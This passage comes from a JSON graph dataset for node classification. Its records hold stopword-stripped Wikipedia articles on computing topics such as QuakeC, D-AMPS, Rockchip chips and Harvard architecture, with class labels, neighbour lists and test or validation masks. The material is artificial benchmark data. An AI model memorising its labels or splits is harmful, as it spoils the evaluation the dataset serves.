written plain c/c++ compiled executable faster however makes harder community create mods makes process porting game another platform gnu/linux costly despite advantages choice implementing game logic using custom scripting language interpreter dropped next generation quake ii engine favor compiled c code due overall inflexibility quakec increasingly complex game logic performance gained packaging game logic native dynamic link library advantage leveraging already established programming language community tools educational materials documentation distributing native code created new security portability concerns quakec bytecode afforded little opportunity mischief native code access whole machine quakec bytecode also worked machine could run quake compiling native code added additional barrier entry novice mod developers asked set complicated programming environment eventual solution implemented quake iii engine combine advantages original quakec advantages compiling c native code lcc c compiler extended compile standard c bytecode could interpreted virtual machine manner similar quakec addressed security portability tool chain problems lost performance advantage native code solved compiling bytecode native code run time supported machines id software released source codice_3 quakec compiler along original quakec code 1996 modified versions soon sprung including jonathan roy codice_4 ryan frikac smith frikqcc added functionality optimizations compiling speed boosts 1999 id software released code quake engine gnu general public license gpl workings bytecode interpreter examined new quakec compilers released j.p. grossman codice_5 new version frikqcc compilers took advantage newly discovered features backwards-compatible way bytecode could still properly interpreted unmodified quake engines new features include arrays pointers integers loops string manipulation quake engine source code able changed features added quakec form new built-in functions features long yearned quakec coders finally reached realization quakec file string handling functions enlarged string buffers math functions however programmers taking advantage changes lost backwards compatibility unmodified quake engine xonotic since version 0.7 uses gmqcc compiler enhanced quake engines notably darkplaces fteqw support extension regular quakec commonly referred server side quakec ssqc allows client side scripting quake engine especially useful guis huds visually heavy effects need simulated server transferred network",
    "neighbors": [
      1952,
      9345,
      11625,
      5931,
      10894,
      9714,
      9780,
      823,
      10296,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9035,
    "label": 2,
    "text": "System_Preferences:system preferences system preferences application included macos operating system allows users modify various system settings divided separate preference panes system preferences application introduced first version mac os x replace control panel included classic mac os prior mac os x control panel small application enabled user modify software hardware settings sound volume desktop pattern control panels differ extensions allow user specify options whereas extensions provide user interface setting preferences many software distributions extensions provided functionality corresponding control panel provided configuration options release mac os x 2001 users modified system settings using control panels control panels like preference panes found system preferences separate resources cdevs accessed apple menu control panel rudimentary form system preferences dates back 1983 apple lisa preferences menu item included subset configurable settings called convenience settings well settings adapted according programs devices installed lisa office system original control panels earliest versions classic mac os combined one small desk accessory susan kare designed interface original control panel tried make user-friendly possible design used system 3 separate control panel files cdev added accessible solely control panel debut system 7 control panels separated individual small application-like processes accessible finder sub-menu apple menu provided apple menu options mac os 9 last release mac os mac os x included 32 control panels mac os 9 many control panels rewritten true applications mac os x released preference panes replaced control panels preference panes applications loadable bundles system preferences application similar arrangement used system 6 default system preferences organizes preference panes several categories latest version system preferences included mac os x v10.7 categories personal hardware internet wireless system fifth category appears third-party preference panes installed users also choose sort preference panes alphabetically system preferences originally included customizable toolbar frequently-used preference pane icons could dragged removed mac os x v10.4 replaced static toolbar featured back forward navigation buttons search field apple added new preference panes major features added operating system occasionally merges multiple panes one exposé introduced mac os x v10.3 corresponding preference pane added system preferences replaced single dashboard exposé pane mac os x v10.4 introduced dashboard .mac service replaced mobileme corresponding preference pane also renamed control panels included mac os 9 os x mountain lion 10.8 includes following preference panes os x mountain lion universal access pane changed accessibility speech changed dictation speech",
    "neighbors": [
      1542,
      4615,
      10765,
      3598,
      5647,
      1042,
      6700,
      4657,
      1074,
      1592,
      576,
      9802,
      5713,
      3670,
      4184,
      6234,
      2141,
      4702,
      3167,
      1121,
      2149,
      8303,
      6771,
      2676,
      5749,
      6783,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      5784,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      213,
      9430,
      3289,
      4318,
      231,
      6377,
      9451,
      4844,
      2288,
      7928,
      8441,
      3324,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      3373,
      7983,
      10036,
      9529,
      10557,
      4933,
      1878,
      7519,
      4457,
      7544,
      9100,
      5520,
      9109,
      1439,
      6048,
      11171,
      1960,
      8114,
      7626,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      9700,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 9036,
    "label": 8,
    "text": "Session_(web_analytics):session web analytics web analytics session visit unit measurement user actions taken within period time regard completion task sessions also used operational analytics provision user-specific recommendations two primary methods used define session time-oriented approaches based continuity user activity navigation-based approaches based continuity chain requested pages definition session varies particularly applied search engines generally session understood consist sequence requests made single end-user visit particular site context search engines sessions query sessions least two definitions session query session may queries made user particular time period may also series queries navigations consistent underlying user need sessions per user used measurement website usage metrics used within research applied web analytics include session length user actions per session session length seen accurate alternative measuring page views reconstructed sessions also used measure total user input including measure number labour hours taken construct wikipedia sessions also used operational analytics data anonymization identifying networking anomalies synthetic workload generation testing servers artificial traffic essential use sessions web analytics able identify known session reconstruction approaches session reconstruction divided two main categories time-oriented navigation-oriented time-oriented approaches session reconstruction look set period user inactivity commonly called inactivity threshold period inactivity reached user assumed left site stopped using browser entirely session ended requests user considered second session common value inactivity threshold 30 minutes sometimes described industry standard argued threshold 30 minutes produces artifacts around naturally long sessions experimented thresholds others simply state time threshold effective identifying sessions one alternative proposed using user-specific thresholds rather single global threshold entire dataset problem assuming thresholds follow bimodal distribution suitable datasets cover long period time navigation-oriented approaches exploit structure websites specifically presence hyperlinks tendency users navigate pages website clicking rather typing full url browser one way identifying sessions looking data build map website user first page identified session actions lasts land page accessed previously-accessed pages takes account backtracking user retrace steps opening new page simpler approach take backtracking account simply require http referer request page already session new session created class heuristics exhibits poor performance websites contain framesets",
    "neighbors": [
      7781,
      6576,
      8914,
      5724,
      5150
    ],
    "mask": "Test"
  },
  {
    "node_id": 9037,
    "label": 3,
    "text": "Palm_IIIe:palm iiie palm iiie pda palm computing released 1999 briefly expensive advanced palm iiix shared screen palm iiix improved upon palm iii screen featuring new enhanced easier read lcd like previous models offered 2-bit display 4 greyscales palm iiie 2mb ram palm iii 16 mhz motorola dragonball ez cpu said faster efficient 16 mhz motorola dragonball cpu found previous palm models palm iiie featured inverse electroluminescent backlight illuminated screen text instead screen background feature found palm iiix feature area controversy many people disliked many others found improvement like palm iiix palm iiie shipped palm os 3.1 however unlike palm iiix palm iiie upgradeable flash rom instead using permanent rom result palm iiie operating system upgrade path palm iiie palm iii series model ship flash rom later special edition iiie device released translucent clear case",
    "neighbors": [
      2308,
      10500,
      6790,
      3606,
      8982,
      6178,
      5164,
      7983,
      9013,
      694,
      5318,
      3017,
      11337,
      2258,
      1621,
      4832,
      4449,
      2285,
      2420,
      8952,
      9598
    ],
    "mask": "None"
  },
  {
    "node_id": 9038,
    "label": 5,
    "text": "Digital_AMPS:digital amps is-54 is-136 second-generation 2g mobile phone systems known digital amps d-amps development north american 1g mobile system advanced mobile phone system amps prevalent throughout americas particularly united states canada since first commercial network deployed 1993 d-amps considered end-of-life existing networks mostly replaced gsm/gprs cdma2000 technologies system often referred tdma name based abbreviation time division multiple access common multiple access technique used 2g standards including gsm well is-54 is-136 however d-amps competing gsm systems based code division multiple access cdma adoption network carriers although phased favor gsm/gprs cdma2000 technology d-amps uses existing amps channels allows smooth transition digital analog systems area capacity increased preceding analog design dividing 30 khz channel pair three time slots hence time division digitally compressing voice data yielding three times call capacity single cell digital system also made calls secure beginning analogue scanners could access digital signals calls encrypted using cmea later found weak is-136 added number features original is-54 specification including text messaging circuit switched data csd improved compression protocol sms csd available part gsm protocol is-136 implemented nearly identical fashion former large is-136 networks including united states rogers wireless canada upgraded existing is-136 networks gsm/gprs rogers wireless removed 1900 mhz is-136 2003 done 800 mhz spectrum equipment failed rogers deactivated is-136 network along amps may 31 2007 soon followed february 2008 shutting tdma amps alltel primarily uses cdma2000 technology acquired tdma network western wireless shut tdma amps networks september 2008 us cellular also primarily uses cdma2000 technology shut tdma network february 2009 is-54 first mobile communication system provision security first employ tdma technology evolution mobile communication began three different geographic regions north america europe japan standards used regions quite independent earliest mobile wireless technologies implemented wholly analogue collectively known 1st generation 1g technologies japan 1g standards nippon telegraph telephone ntt high capacity version hicap early systems used throughout europe compatible meaning later idea common 'european union viewpoint/technological standard absent time various 1g standards use europe included c-netz germany austria comviq sweden nordic mobile telephones/450 nmt450 nmt900 nordic countries nmt-f french version nmt900 radiocom 2000 rc2000 france tacs total access communication system united kingdom italy ireland north american standards advanced mobile phone system amps narrow-band amps n-amps 1g standards successful amps system despite nordic countries cooperation european engineering efforts divided among various standards japanese standards get much attention developed bell labs 1970s first used commercially united states 1983 amps operates 800 mhz band united states widely distributed analog cellular standard 1900 mhz pcs band established 1994 digital operation success amps kick-started mobile age north america market showed increasing demand higher capacity mobility then-existing mobile communication standards capable handling example bell labs system 1970s could carry 12 calls time throughout new york city amps used frequency division multiple access fdma enabled cell site transmit different frequencies allowing many cell sites built near amps also many disadvantages well primarily ability support ever-increasing demand mobile communication usage cell site much capacity carrying higher numbers calls amps also poor security system allowed people steal phone serial code use making illegal calls triggered search capable system quest resulted is-54 first american 2g standard march 1990 north american cellular network incorporated is-54b standard first north american dual mode digital cellular standard standard motorola narrowband amps n-amps analog scheme increased capacity cutting voice channels 30 khz 10 khz is-54 hand increased capacity digital means using tdma protocols method separates calls time placing parts individual conversations frequency one next tdma tripled call capacity using is-54 cellular carrier could convert system analog voice channels digital dual mode phone uses digital channels available defaults regular amps is-54 backward compatible analogue cellular indeed co-existed radio channels amps analogue customers left behind simply could access is-54 new features is-54 also supported authentication help preventing fraud is-54 employs 30 khz channel spacing frequency bands 824-849 869-894 mhz amps capacity increased preceding analog design dividing 30 khz channel pair three time slots digitally compressing voice data yielding three times call capacity single cell digital system also made calls secure analog scanners could access digital signals is-54 standard specifies 84 control channels 42 shared amps maintain compatibility existing amps cellular telephone system primary forward reverse control channels is-54 cellular systems use signaling techniques modulation scheme binary fsk amps amps/is-54 infrastructure support use either analog amps phones d-amps phones access method used is-54 time division multiple access tdma first u.s. digital standard developed adopted tia 1992 tdma subdivides 30 khz amps channels three full-rate tdma channels capable supporting single voice call later full-rate channels sub-divided two half-rate channels necessary coding compression could also support voice call thus tdma could provide three six times capacity amps traffic channels tdma initially defined is-54 standard specified is-13x series specifications eia/tia channel transmission bit rate digitally modulating carrier 48.6 kbit/s frame six time slots 6.67-ms duration time slot carries 324 bits information 260 bits 13-kbit/s full-rate traffic data 64 bits overhead 28 synchronization contain specific bit sequence known receivers establish frame alignment also gsm known sequence acts training pattern initialize adaptive equalizer is-54 system different synchronization sequences six time slots making frame thereby allowing receiver synchronize preassigned time slots additional 12 bits every time slot sacch i.e system control information digital verification color code dvcc equivalent supervisory audio tone used amps system 256 different 8-bit color codes protected 12 8 3 hamming code base station preassigned color code incoming interfering signals distant cells ignored modulation scheme is-54 7c/4 differential quaternary phase shift keying dqpsk otherwise known differential 7t/4 4-psk π/4 dqpsk technique allows bit rate 48.6 kbit/s 30 khz channel spacing give bandwidth efficiency 1.62 bit/s/hz value 20 better gsm major disadvantage type linear modulation method power inefficiency translates heavier hand-held portable even inconvenient shorter time battery recharges conversation data bits makes data field six slots make complete is-54 frame data slots 1 4 2 5 3 6 make voice circuit dvcc stands digital verification color code arcane terminology unique 8-bit code value assigned cell g means guard time period time slot rsvd stands reserved sync represents synchronization critical tdma data field slot every frame must synchronized others master clock everything work time slots mobile-to-base direction constructed differently base-to-mobile direction essentially carry information arranged differently notice mobile-to-base direction 6-bit ramp time enable transmitter time get full power 6-bit guard band nothing transmitted 12 extra bits base-to-mobile direction reserved future use call comes mobile switches different pair frequencies voice radio channel system carrier made analog digital pair carries call is-54 signal detected gets assigned digital traffic channel one available fast associated channel facch performs handoffs call need mobile go back control channel case high noise facch embedded within digital traffic channel overrides voice payload degrading speech quality convey control information purpose maintain connectivity slow associated control channel sacch perform handoffs conveys things like signal strength information base station is-54 speech coder uses technique called vector sum excited linear prediction vselp coding special type speech coder within large class known code-excited linear prediction celp coders speech coding rate 7.95 kbit/s achieves reconstructed speech quality similar analog amps system using frequency modulation 7.95-kbit/s signal passed channel coder loads bit rate 13 kbit/s new half-rate coding standard reduces overall bit rate call 6.5 kbit/s provide comparable quality 13-kbit/s rate half-rate gives channel capacity six times analog amps discussion communication system complete without explanation system example dual-mode cellular phone specified is-54 standard explained dual-mode phone capable operating analog-only cell dual-mode cell transmitter receiver support analog fm digital time division multiple access tdma schemes digital transmission preferred cellular system digital capability mobile unit assigned digital channel first digital channels available cellular system assign analog channel transmitter converts audio signal radio frequency rf receiver converts rf signal audio signal antenna focuses converts rf energy reception transmission free space control panel serves input/output mechanism end user supports keypad display microphone speaker coordinator synchronizes transmission receives functions mobile unit dual-mode cellular phone consists following 1993 american cellular running capacity despite wide movement is-54 american cellular business continued booming subscribers grew one half million customers 1988 thirteen million subscribers 1993 room existed technologies cater growing market technologies followed is-54 stuck digital backbone laid pragmatic effort launched improve is-54 eventually added extra channel is-54 hybrid design unlike is-54 is-136 utilizes time division multiplexing voice control channel transmissions digital control channel allows residential in-building coverage dramatically increased battery standby time several messaging applications air activation expanded data applications is-136 systems needed support millions amps phones designed manufactured is-54 is-136 considered is-136 added number features original is-54 specification including text messaging circuit switched data csd improved compression protocol is-136 tdma traffic channels use π/4-dqpsk modulation 24.3-kilobaud channel rate gives effective 48.6 kbit/s data rate across six time slots comprising one frame 30 khz channel mobility largest us carrier support d-amps refers tdma turned existing network order release spectrum gsm umts platforms 19 wireless markets started may 30 2007 areas followed june july tdma network markets operated 1900 mhz frequency coexist amps network service remaining 850 mhz tdma markets discontinued along amps service february 18 2008 except areas service provided dobson communications dobson tdma amps network shut march 1 2008 may 31 2007 rogers wireless decommissioned d-amps amps networks moved remaining customers older networks onto gsm network alltel completed shutdown d-amps amps networks september 2008 last carrier united states operate d-amps network u.s. cellular shut d-amps network february 2009",
    "neighbors": [
      8160,
      4609,
      3140,
      5704,
      4041,
      7498,
      7723,
      11181,
      2802,
      5433,
      2458
    ],
    "mask": "None"
  },
  {
    "node_id": 9039,
    "label": 8,
    "text": "Google_URL_Shortener:google url shortener google url shortener also known goo.gl discontinued url shortening service offered google launched december 2009 initially used google toolbar feedburner later google launched separate website goo.gl opened public september 2010 user could access list urls shortened past logging google account user could see additional details via details link next shortened url public real-time analytics data including traffic time top referrers visitor profiles could found security google added automatic spam detection based type filtering technology used gmail service accepting new users since april 13 2018 google discontinued service existing users march 30 2019 links previously created still redirect previous destination succeeded firebase dynamic links existing links wo n't become dynamic links automatically",
    "neighbors": [
      4995,
      5892,
      7816,
      5262,
      8719,
      5524,
      7700,
      10390,
      10645,
      8858,
      1435,
      10525,
      2978,
      4901,
      1959,
      3499,
      10284,
      1203,
      5431,
      7359,
      196,
      3269,
      3782,
      11590,
      7370,
      4683,
      11343,
      3664,
      3795,
      1240,
      8413,
      6367,
      2658,
      488,
      6632,
      5483,
      236,
      9712,
      9970,
      8821,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 9040,
    "label": 7,
    "text": "List_of_grid_computing_middleware_distribution:list grid computing middleware distribution grid middleware distribution software stack set cooperating components services protocols enable users access distributed resources grid",
    "neighbors": [
      3331,
      5956,
      198,
      3849,
      875,
      8030,
      404,
      4052,
      2710,
      2651,
      222
    ],
    "mask": "Test"
  },
  {
    "node_id": 9041,
    "label": 2,
    "text": "Pointer_swizzling:pointer swizzling computer science pointer swizzling conversion references based name position direct pointer references typically performed deserialization loading relocatable object disk executable file pointer-based data structure reverse operation replacing pointers position-independent symbols positions sometimes referred unswizzling performed serialization saving example suppose following linked list data structure easily create linked list data structure memory using object attempt save disk run trouble directly saving pointer values wo n't work architectures nodes almost certainly loaded different memory positions one way dealing assign unique id number node unswizzle pointers turning field indicating id number next node save records disk order information lost options include saving file offset next node number indicating position sequence saved records go load nodes however quickly discover attempting find node based number cumbersome inefficient 'd like original data structure back simply follow next pointers traverse list perform pointer swizzling finding address node turning id_number_of_next_node fields back direct pointers right node potentially unlimited number forms pointer unswizzled popular include security methods must implemented great deal caution particular attacker presentation specially crafted file may allow access addresses outside expected proper bounds systems weak memory protection lead exposure confidential data modification code likely executed system implement guards execution data system may severely compromised installation various kinds malware methods protection include verifications prior releasing data application swizzling general case complicated reference graph pointers might contain arbitrary number cycles complicates maintaining mapping old unswizzled values new addresses associative arrays useful maintaining mapping algorithms breadth-first search help traverse graph although require extra storage various serialization libraries provide general swizzling systems many cases however swizzling performed simplifying assumptions tree list structure references different types swizzling",
    "neighbors": [
      10470,
      10632,
      2804,
      7734,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 9042,
    "label": 3,
    "text": "List_of_Rockchip_products:list rockchip products list rockchip products rk3399 flagship soc rockchip dual a72 quad a53 mali-t860mp4 gpu providing high computing multi-media performance rich interfaces peripherals software supports multiple apis opengl es 3.2 vulkan 1.0 opencl 1.1/1.2 openvx1.0 ai interfaces support tensorflow lite/androidnn api rk3399 linux source code hardware documents github wiki opensource website rk3288 high performance iot platform quad-core cortex-a17 cpu mali-t760mp4 gpu 4k video decoding 4k display applied products various industries including vending machine commercial display medical equipment gaming intelligent pos interactive printer robot industrial computer rk3288 linux source code hardware documents github wiki opensource website rk3326 px30 newly announced 2018 designed smart ai solutions px30 variant rk3326 targeting iot market supporting dual vop arm new generation cpu cortex-a35 gpu g31 rk3308 another newly released chipset targeting smart ai solutions entry-level chipset aimed mainstream devices chip multiple audio input interfaces greater energy efficiency featuring embedded vad voice activation detection announcement rv1108 indicated rockchip moves ai/computer vision territory ceva dsp embedded rv1108 powers smart cameras including 360° video camera ipc drone car camcoder sport dv vr etc also deployed new retail intelligent marketing applications integrated algorithms rk1808 rockchip first chip neural processing unit npu artificial intelligence applications rk1808 specifications include rk3530 rk3530 soc ship q3 2019 targeting set-top box market rk3530 specifications include rv1109 rk3358 rv1109 vision processor soc ship q4 2019 rv1109 specifications include rk3358 high-end soc ship q1 2020 rk3358 specifications include rk26xx series released 2006 rk27xx series rockchip first known rk 27xx series efficient mp3/mp4 decoding integrated many low-cost personal media player pmp products rk28xx series rk2806 targeted pmps rk2808a arm926ej-s derivative along arm core dsp coprocessor included native clock speed 560 mhz arm rates performance arm926ej-s 1.1 dmips/mhz performance rockchip 2808 executing arm instructions therefore 660 dmips roughly 26 speed apple a4 processor dsp coprocessor support real-time decoding 720p video files bitrates 2.5 mbit/s chip core many android windows mobile-based mobile internet devices.. rk2816 targeted pmp devices mids specifications rk2806 also includes hdmi output android support 720p hardware video acceleration rk29xx series rockchip rk291x family socs based arm cortex-a8 cpu core presented first time ces 2011 rk292x single core socs based arm cortex-a9 first introduced 2012 rk2918 first chip decode google webm vp8 hardware uses dynamically configurable companion core process various codecs encodes decodes h.264 1080p decode many standard video formats including xvid h.263 avs mpeg4 rv wmv includes vivante gc800 gpu compatible opengl es 2.0 openvg rk2918 compatible android froyo 2.2 gingerbread 2.3 honeycomb 3.x ice cream sandwich 4.0 unofficial support ubuntu linux flavours exists 2013 targeted e-readers rk2906 basically cost-reduced version rk2918 also targeted e-readers 2013 rockchip rk2926 rk2928 feature single core arm cortex a9 running speed 1.0 ghz replaces vivante gc800 gpu older rk291x series arm mali-400 gpu 2013 rk2926 targeted tablets rk2928 targeted tablets android tv dongles boxes rk30xx series rk3066 high performance dual-core arm cortex-a9 mobile processor similar samsung exynos 4 dual core chip terms performance rk3066 samsung exynos 4210 samsung exynos 4212 2013 targeted tablets android tv dongles boxes popular choice tablets devices since 2012 rk3068 version rk3066 specifically targeted android tv dongles boxes package much smaller rk3066 rk3028 low-cost dual-core arm cortex-a9-based processor clocked 1.0 ghz arm mali-400 gpu pin-compatible rk2928 used kids tablets low-cost android hdmi tv dongles rk3026 updated ultra-low-end dual-core arm cortex-a9-based tablet processor clocked 1.0 ghz arm mali-400 mp2 gpu manufactured 40 nm pin-compatible rk2926 features 1080p h.264 video encoding 1080p decoding multiple formats supporting android 4.4 adopted low-end tablets 2014 rk3036 low-cost dual-core arm cortex-a7-based processor released q4 2014 smart set-top boxes support h.265 video decoding rk3188 first product rk31xx series announced production 2nd quarter 2013 rk3188 features quad-core arm cortex-a9 clocked 1.6 ghz frequency targeted tablets android tv dongles boxes popular choice tablets devices requiring good performance rk3188t lower-clocked version rk3188 cpu cores running maximum speed 1.4 ghz instead 1.6 ghz mali-400mp4 gpu also clocked lower speed early 2014 many devices advertised using rk3188 maximum clock speed 1.6 ghz actually rk3188t clock speed limited 1.4 ghz operating system roms specifically made rk3188 may work correctly rk3188t rk3168 first shown april 2013 dual-core cortex a9-based cpu also manufactured using 28 nm process targeted low-end tablets chip seen limited use may 2014 rk3126 entry-level tablet processor introduced q4 2014 manufactured using 40 nm process features quad-core cortex-a7 cpu 1.3 ghz mali-400 mp2 gpu pin-compatible rk3026 rk2926 rk3128 higher-end variant rk3126 also introduced q4 2014 features integrated external interfaces including cvbs hdmi ethernet mac s/pdif audio dac usb targets fully featured tablets set-top boxes rockchip announced rk3288 production second quarter 2014 recent information suggests chip uses quad-core arm cortex-a17 cpu although technically arm cortex-a12 october 1 2014 arm decided also refer cortex-a17 latest production version cortex-a12 performs similar performance level cortex-a17 early reports including rockchip first suggested summer 2013 rk3288 originally designed using quad-core arm cortex-a12 configuration rockchip primary foundry partner globalfoundries announced partnership arm optimize arm cortex-a12 28 nm-slp process process used earlier rockchip chips rk3188 matches choice cortex-a12 cores design rk3288 january 2014 official marketing materials listed cpu cores arm cortex-a17 ces electronics show january 2014 someone apparently corrected cpu specification arm cortex-a12 instead cortex-a17 one panels show booth however since official specifications rockchip website marketing materials well specifications used device manufacturers continued describe cpu quad-core arm cortex-a17 recent testing early rk3288-based tv boxes august/september 2014 provided evidence rk3288 technically contains cortex-a12 cores since arm 0xc0d cpu archtitecture reported cpu-z android reference cortex-a12 original cortex-a17 referred arm 0xc0e however arm community website arm clarified situation october 1 2014 saying cortex-a12 rockchip one known customers called cortex-a17 references cortex-a12 removed arm website arm explained latest production revision cortex-a12 performs close level cortex-a17 improvements cortex-a17 also applied latest version cortex-a12 way rockchip gets official blessing arm listing cores inside rk3288 cortex-a17 first android tv stick based rk3288 launched november 2014 zero devices z5c thinko rockchip announced first member rk33xx family ces show january 2015 rk3368 soc targeting tablets media boxes featuring 64-bit octa-core cortex-a53 cpu opengl es 3.1-class gpu rk3399 announced arm mobile world congress february 2016 features six 64 bit cpu cores including 2 cortex-a72 4 cortex-a53 consumer devices include rockchip provides open source software github maintains wiki linux sdk website offer free downloads soc hardware documents software development resources well third-party development kits info chipsets available rk3399 rk3288 rk3328 rk3036 market socs tablets rockchip faces competition allwinner technology mediatek intel actions semiconductor spreadtrum leadcore technology samsung semiconductor qualcomm broadcom via technologies amlogic establishing position early developing chinese tablet soc market 2012 faced challenge allwinner 2012 rockchip shipped 10.5 million tablet processors compared 27.5 million allwinner however q3 2013 rockchip forecast ship 6 million tablet-use application processors china compared 7 million allwinner mainly shipped single-core products rockchip reported number one supplier tablet-use application processors china q4 2013 q1 2014 q2 2014 chinese soc suppliers cellular baseband technology disadvantage compared companies mediatek also supply smartphone market white-box tablet makers increasingly add phone cellular data functionality products intel corporation made investments tablet processor market heavily subsidizing entry low-cost tablet market 2014 may 2014 intel announced agreement rockchip jointly deliver intel-branded mobile soc platform based intel atom processor 3g modem technology terms agreement two companies deliver intel-branded mobile soc platform quad-core platform based intel atom processor core integrated intel 3g modem technology expected available first half 2015 intel rockchip sell new part oems odms primarily company existing customer base october 2014 rockchip already offering intel xmm 6321 low-end smartphones two chips dual-core application processor either intel processor cores arm cortex-a5 cores integrated modem xg632 integrated rf chip ag620 originates cellular chip division infineon technologies intel acquired time ago application processor may also originate infineon intel rockchip earlier targeted smartphone space material way",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      1578,
      4139,
      8237,
      2097,
      1083,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      5276,
      4258,
      9913,
      8383,
      10945,
      4821,
      2788,
      5356,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      2838,
      5417,
      810,
      3883,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      6009,
      392,
      1428,
      4508,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      3537,
      980,
      9174,
      10199,
      2524,
      9182,
      3043,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 9043,
    "label": 5,
    "text": "Clearinghouse_for_Networked_Information_Discovery_and_Retrieval:clearinghouse networked information discovery retrieval clearinghouse networked information discovery retrieval cnidr organization funded u.s. national science foundation 1993 1997 based microelectronics center north carolina mcnc research triangle park cnidr active research development open source software open standards centered information discovery retrieval emerging internet among software developed cnidr isite open source z39.50 implementation successor free version wais isearch open source text retrieval system cnidr staff involved development open standards internet engineering task force z39.50 implementors group dublin core cnidr collaborated u.s. patent trademark office uspto develop uspto first internet-based patent search systems one provided full text searching images medical patents related research treatment hiv/aids issued us japanese european patent offices another system known us patent bibliographic database provided searching front page bibliographic information us patents since 1976",
    "neighbors": [
      140,
      3191,
      3052
    ],
    "mask": "None"
  },
  {
    "node_id": 9044,
    "label": 3,
    "text": "Harvard_architecture:harvard architecture harvard architecture computer architecture physically separate storage signal pathways instructions data term originated harvard mark relay-based computer stored instructions punched tape 24 bits wide data electro-mechanical counters early machines data storage entirely contained within central processing unit provided access instruction storage data programs needed loaded operator processor could initialize today processors implement separate signal pathways performance reasons actually implement modified harvard architecture support tasks like loading program disk storage data executing harvard architecture need make two memories share characteristics particular word width timing implementation technology memory address structure differ systems instructions pre-programmed tasks stored read-only memory data memory generally requires read-write memory systems much instruction memory data memory instruction addresses wider data addresses system pure von neumann architecture instructions data stored memory instructions fetched data path used fetch data means cpu simultaneously read instruction read write data memory computer using harvard architecture cpu read instruction perform data memory access time even without cache harvard architecture computer thus faster given circuit complexity instruction fetches data access contend single memory pathway also harvard architecture machine distinct code data address spaces instruction address zero data address zero instruction address zero might identify twenty-four-bit value data address zero might indicate eight-bit byte part twenty-four-bit value modified harvard architecture machine much like harvard architecture machine relaxes strict separation instruction data still letting cpu concurrently access two memory buses common modification includes separate instruction data caches backed common address space cpu executes cache acts pure harvard machine accessing backing memory acts like von neumann machine code moved around like data powerful technique modification widespread modern processors arm architecture power isa x86 processors sometimes loosely called harvard architecture overlooking fact actually modified another modification provides pathway instruction memory rom flash memory cpu allow words instruction memory treated read-only data technique used microcontrollers including atmel avr allows constant data text strings function tables accessed without first copied data memory preserving scarce power-hungry data memory read/write variables special machine language instructions provided read data instruction memory instruction memory accessed using peripheral interface distinct instructions embed constant data although individual constants two mechanisms substitute recent years speed cpu grown many times comparison access speed main memory care needs taken reduce number times main memory accessed order maintain performance instance every instruction run cpu requires access memory computer gains nothing increased cpu speed—a problem referred memory bound possible make extremely fast memory practical small amounts memory cost power signal routing reasons solution provide small amount fast memory known cpu cache holds recently accessed data long data cpu needs cache performance much higher cpu get data main memory modern high performance cpu chip designs incorporate aspects harvard von neumann architecture particular split cache version modified harvard architecture common cpu cache memory divided instruction cache data cache harvard architecture used cpu accesses cache case cache miss however data retrieved main memory formally divided separate instruction data sections although may well separate memory controllers used concurrent access ram rom flash memory thus von neumann architecture visible contexts data code come memory controller hardware implementation gains efficiencies harvard architecture cache accesses least main memory accesses addition cpus often write buffers let cpus proceed writes non-cached regions von neumann nature memory visible instructions written data cpu software must ensure caches data instruction write buffer synchronized trying execute just-written instructions principal advantage pure harvard architecture—simultaneous access one memory system—has reduced modified harvard processors using modern cpu cache systems relatively pure harvard architecture machines used mostly applications trade-offs like cost power savings omitting caches outweigh programming penalties featuring distinct code data address spaces even cases common employ special instructions order access program memory though data read-only tables reprogramming processors modified harvard architecture processors",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      11314,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      3178,
      108,
      8815,
      630,
      8822,
      6268,
      3197,
      7299,
      7313,
      1175,
      6815,
      8352,
      5793,
      6818,
      4773,
      6821,
      682,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      9978,
      2811,
      8700,
      7421,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      7445,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      2383,
      7505,
      11604,
      344,
      8543,
      1376,
      10603,
      8048,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      8609,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1462,
      1463,
      7607,
      1469,
      4030,
      453,
      3014,
      466,
      4569,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      3050,
      9707,
      1005,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9045,
    "label": 9,
